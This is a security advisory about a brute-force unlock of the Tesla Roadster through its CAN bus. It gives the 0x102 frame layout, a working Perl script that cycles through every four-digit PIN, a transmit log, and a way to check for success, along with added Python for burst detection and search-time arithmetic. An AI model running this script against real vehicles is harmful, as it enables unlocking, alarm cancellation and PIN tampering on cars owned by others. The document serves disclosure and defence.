Vulnerability Announcement: Tesla Roadster vulnerable to brute-force unlock via CAN bus

SUMMARY

The Tesla Roadster instrumentation CAN bus (running at 1 MHz) carries a CAN message that locks/unlocks the car and enables/disables valet mode. Authentication for this message is a simple user PIN code, typically 4 digits but up to 8 digits.

This message appears to be vulnerable to a brute-force attack, as there is no rate limiting on its reception or interpretation.

TECHNICAL DETAILS

The CAN bus message is:

ID: 0x102
B1: 0x0B
B2: 0x00 = Activate valet mode
    0x01 = Deactivate valet mode
    0x02 = Lock car
    0x03 = Unlock car
B3: 0x00
B4: 0x00
B5: PIN LSB
B6: PIN
B7: PIN (28 bits in total for the PIN)
B8: PIN MSB
    4 MSB bits = number of PIN digits (1-8)
    4 LSB bits = PIN MSB (PIN bits 24-27)

Note: Example PIN 1234 unlock is 0x0B, 0x03, 0x00, 0x00, 0xD2, 0x04, 0x00, 0x40
Note: Lock/unlock does not affect the immobiliser and alarm fitted to vehicles outside North America

An example script (Perl) using a laptop and a USB-to-CAN bus adaptor that speaks the SLCAN ASCII protocol:

use strict;
use warnings;

# Serial device of the USB-to-CAN adaptor, assumed already configured for the
# 1 Mbit/s instrumentation bus. The device path is an assumption; adjust for your adaptor.
open(my $canusb, '+<', '/dev/ttyUSB0') or die "cannot open CAN adaptor: $!";

sub teslacrack
  {
  my ($fn, $pin) = @_;

  # SLCAN frame: 't' + ID 0x102 + DLC 8 + B1..B8 as hex.
  # B8 = (number of PIN digits << 4) | PIN bits 24-27; a 4-digit PIN gives 0x40.
  my $msg = sprintf 't10280b%02x0000%02x%02x%02x%02x',
    $fn,
    $pin & 0xff,
    ($pin >> 8) & 0xff,
    ($pin >> 16) & 0xff,
    (4 << 4) | (($pin >> 24) & 0x0f);

  print $canusb $msg, "\r";
  }

my $pin = 0;
for (0 .. 9999)
  {
  teslacrack(3, $pin++);   # function 3 = unlock car
  }

Transmitting at 100 messages per second, I tested PINs 0000 through 9999 in 100 seconds. The average PIN discovery time at this rate is therefore approximately 50 seconds.

1493791128.000 CXX TESLACRACK FN#3 PIN5142 => t10280b03000016140040
1493791128.000 CXX TESLACRACK FN#3 PIN5143 => t10280b03000017140040
1493791128.000 CXX TESLACRACK FN#3 PIN5144 => t10280b03000018140040
1493791128.000 CXX TESLACRACK FN#3 PIN5145 => t10280b03000019140040
1493791128.000 CXX TESLACRACK FN#3 PIN5146 => t10280b0300001a140040
1493791128.000 CXX TESLACRACK FN#3 PIN5147 => t10280b0300001b140040
1493791128.000 CXX TESLACRACK FN#3 PIN5148 => t10280b0300001c140040
1493791128.000 CXX TESLACRACK FN#3 PIN5149 => t10280b0300001d140040
1493791128.000 CXX TESLACRACK FN#3 PIN5150 => t10280b0300001e140040
1493791128.000 CXX TESLACRACK FN#3 PIN5151 => t10280b0300001f140040
1493791128.000 CXX TESLACRACK FN#3 PIN5152 => t10280b03000020140040
1493791128.000 CXX TESLACRACK FN#3 PIN5153 => t10280b03000021140040
1493791128.000 CXX TESLACRACK FN#3 PIN5154 => t10280b03000022140040
1493791128.000 CXX TESLACRACK FN#3 PIN5155 => t10280b03000023140040
1493791128.000 CXX TESLACRACK FN#3 PIN5156 => t10280b03000024140040
1493791128.000 CXX TESLACRACK FN#3 PIN5157 => t10280b03000025140040
1493791128.000 CXX TESLACRACK FN#3 PIN5158 => t10280b03000026140040
1493791128.000 CXX TESLACRACK FN#3 PIN5159 => t10280b03000027140040
1493791128.000 CXX TESLACRACK FN#3 PIN5160 => t10280b03000028140040
1493791128.000 CXX TESLACRACK FN#3 PIN5161 => t10280b03000029140040
1493791128.000 CXX TESLACRACK FN#3 PIN5162 => t10280b0300002a140040

The CAN-USB adaptor I used was limited to approximately 100 messages per second. A faster adaptor could brute-force this more quickly.

Although not used for this brute-force test, the VMS sends a CAN message indicating the lock status: ID 0x100 with B1=0x96. That message can be used to verify programmatically whether the PIN just tested was correct.
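The following is an added example, not code from the advisory: a Python decoder for the ID 0x102 / B1 0x0B frame laid out above, fed from SLCAN text in the same format as the transmit log, plus the rate check a bus monitor would need to supply since the vehicle itself has none. It decodes the advisory's PIN 1234 example and the logged frames, and raises an alert when more than a threshold of PIN-bearing frames arrive within one second. The log lines used as input are constructed from the advisory's own transmit log; the one ID 0x100 frame uses only the ID and B1 value the advisory gives, with an illustrative DLC.

```python
# Added example (not part of the original advisory): decode the ID 0x102 / B1 0x0B
# lock/unlock frame from SLCAN text and flag brute-force bursts on the bus.
from collections import deque
from dataclasses import dataclass
from typing import List, Optional, Tuple

FUNCTIONS = {0x00: "activate valet mode", 0x01: "deactivate valet mode",
             0x02: "lock car", 0x03: "unlock car"}


@dataclass
class PinRequest:
    function: int     # B2
    pin_length: int   # high nibble of B8: number of PIN digits (1..8)
    pin: int          # 28-bit value: B5 (LSB), B6, B7, low nibble of B8 (MSB)

    def pin_text(self) -> str:
        # Zero-pad to the declared length, so value 5 with length 4 is "0005".
        return str(self.pin).zfill(self.pin_length)


def parse_slcan(frame: str) -> Tuple[int, bytes]:
    """Parse a Lawicel/SLCAN standard-ID data frame: 't' + 3 hex ID + 1 hex DLC + data."""
    frame = frame.strip()
    if not frame.startswith("t") or len(frame) < 5:
        raise ValueError("not an SLCAN standard-ID data frame")
    can_id = int(frame[1:4], 16)
    dlc = int(frame[4], 16)
    data = bytes.fromhex(frame[5:5 + 2 * dlc])
    if len(data) != dlc:
        raise ValueError("truncated frame")
    return can_id, data


def decode_pin_request(can_id: int, data: bytes) -> Optional[PinRequest]:
    """Return the decoded PIN request for 0x102 / B1=0x0B frames, None for anything else."""
    if can_id != 0x102 or len(data) != 8 or data[0] != 0x0B:
        return None
    pin = data[4] | (data[5] << 8) | (data[6] << 16) | ((data[7] & 0x0F) << 24)
    return PinRequest(function=data[1], pin_length=data[7] >> 4, pin=pin)


class BruteForceDetector:
    """Sliding-window counter: the receiver has no rate limit, so a monitor must
    supply one. Alerts once `threshold` PIN-bearing frames arrive within `window` s."""

    def __init__(self, threshold: int = 10, window: float = 1.0):
        self.threshold, self.window = threshold, window
        self._times: deque = deque()

    def observe(self, t: float) -> bool:
        self._times.append(t)
        while self._times and t - self._times[0] > self.window:
            self._times.popleft()
        return len(self._times) >= self.threshold


def scan_log(lines: List[str], threshold: int = 10,
             window: float = 1.0) -> List[Tuple[float, str, str]]:
    """Walk log lines in the advisory's format ('<timestamp> ... => <slcan frame>');
    return (timestamp, function name, PIN) for every frame that trips the detector."""
    detector = BruteForceDetector(threshold, window)
    alerts = []
    for line in lines:
        parts = line.split()
        timestamp, frame = float(parts[0]), parts[-1]
        req = decode_pin_request(*parse_slcan(frame))
        if req is None:
            continue                      # not a PIN-bearing frame, ignore it
        if detector.observe(timestamp):
            alerts.append((timestamp, FUNCTIONS.get(req.function, "unknown"), req.pin_text()))
    return alerts


# Constructed sample: twelve consecutive frames from the advisory's transmit log plus
# one non-PIN frame (ID 0x100, B1 0x96 per the advisory; its DLC here is illustrative).
SAMPLE_LOG = [
    "1493791128.000 CXX TESLACRACK FN#3 PIN5142 => t10280b03000016140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5143 => t10280b03000017140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5144 => t10280b03000018140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5145 => t10280b03000019140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5146 => t10280b0300001a140040",
    "1493791128.000 CXX STATUS => t100196",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5147 => t10280b0300001b140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5148 => t10280b0300001c140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5149 => t10280b0300001d140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5150 => t10280b0300001e140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5151 => t10280b0300001f140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5152 => t10280b03000020140040",
    "1493791128.000 CXX TESLACRACK FN#3 PIN5153 => t10280b03000021140040",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("brute-force burst: t=%.3f %s PIN %s" % alert)
```

With the default threshold of ten frames per second the sample trips on the tenth PIN-bearing frame (PIN 5151) and on each one after it; the status frame is skipped by the decoder and does not count. A legitimate user entering a PIN produces a handful of these frames at most, so a threshold well below the 100 per second seen in the test separates the two cases comfortably.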

IMPACT

The instrumentation CAN bus is available at various points in the car, with the simplest being the engineering diagnostic connector in the passenger footwell of the vehicle.

The PIN code permits the following functions:

  1. Enable valet mode
  2. Disable valet mode
  3. Lock the vehicle
  4. Unlock the vehicle
  5. Cancel the alarm (via unlocking the vehicle) in North American vehicles
  6. Change the PIN code

On vehicles outside North America, a separate alarm system and immobiliser is used. That system is not affected by this PIN code, so functions 4 and 5 will have limited impact on these vehicles.

A separate physical key, used to start the vehicle and unlock the steering wheel, is not affected by this vulnerability.

Overall, it seems that the greatest concerns for this brute force attack would be:

  • Cancelling a sounding alarm on North American vehicles
  • Providing access to the trunk and glove compartment of a locked vehicle
  • Malicious prank to enable valet mode
  • Malicious prank to change the PIN code (possibly after enabling valet mode)

MITIGATION

While the default PIN code provided with the vehicle is 4 digits, the system does seem to accept longer PIN codes. Using a longer PIN code increases the time needed to brute-force it.
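As an added illustration (not from the advisory) of what the mitigation buys, the Python below computes worst-case and average search time for each PIN length the vehicle accepts at the 100 messages per second measured above, and, for comparison, the time under a lockout after repeated failures. The lockout is a hypothetical control, included only to show the effect of the rate limiting the advisory says is absent; its parameters (5 failures, 60 seconds) are assumptions.

```python
# Added example (not part of the original advisory): how PIN length, attempt rate and
# a hypothetical lockout change the time a brute-force search needs.
def worst_case_seconds(pin_digits: int, rate: float = 100.0) -> float:
    """Every candidate of a decimal PIN tried once at `rate` attempts per second."""
    return 10 ** pin_digits / rate


def average_seconds(pin_digits: int, rate: float = 100.0) -> float:
    """Expected time when the real PIN is equally likely to sit anywhere in the search order."""
    return worst_case_seconds(pin_digits, rate) / 2


def worst_case_with_lockout(pin_digits: int, rate: float = 100.0,
                            failures_before_lockout: int = 5,
                            lockout_seconds: float = 60.0) -> float:
    """Hypothetical control (assumed, not present in the vehicle): after N wrong PINs the
    receiver ignores the message for `lockout_seconds`. Attempts sent during a lockout are
    wasted, so every lockout before the last candidate must be waited out."""
    candidates = 10 ** pin_digits
    lockouts = (candidates - 1) // failures_before_lockout   # wrong guesses before the last one
    return candidates / rate + lockouts * lockout_seconds


def search_time_table(rate: float = 100.0, digits=range(4, 9)) -> dict:
    """{digits: (worst-case seconds, average seconds)} for the PIN lengths the vehicle accepts."""
    return {n: (worst_case_seconds(n, rate), average_seconds(n, rate)) for n in digits}


if __name__ == "__main__":
    for n, (worst, avg) in search_time_table().items():
        print(f"{n} digits at 100 msg/s: worst {worst / 3600:9.2f} h, average {avg / 3600:9.2f} h")
    print(f"4 digits with a 60 s lockout after 5 failures: "
          f"{worst_case_with_lockout(4) / 3600:.1f} h worst case")
```

For 4 digits the table reproduces the advisory's 100 s worst case and 50 s average; each extra digit multiplies both by ten, so the 8-digit maximum is about 11.6 days worst case at this rate, and a faster adaptor shortens it proportionally. The lockout column shows why rate limiting rather than PIN length is the stronger control: with the assumed 5-failure, 60-second lockout even a 4-digit PIN takes over 33 hours.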

Reported: 3 May 2017
Classification: Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
Vendor Response: Declined to address, and no fix for more than 1 year, so public release
Public Release: 3 Dec 2018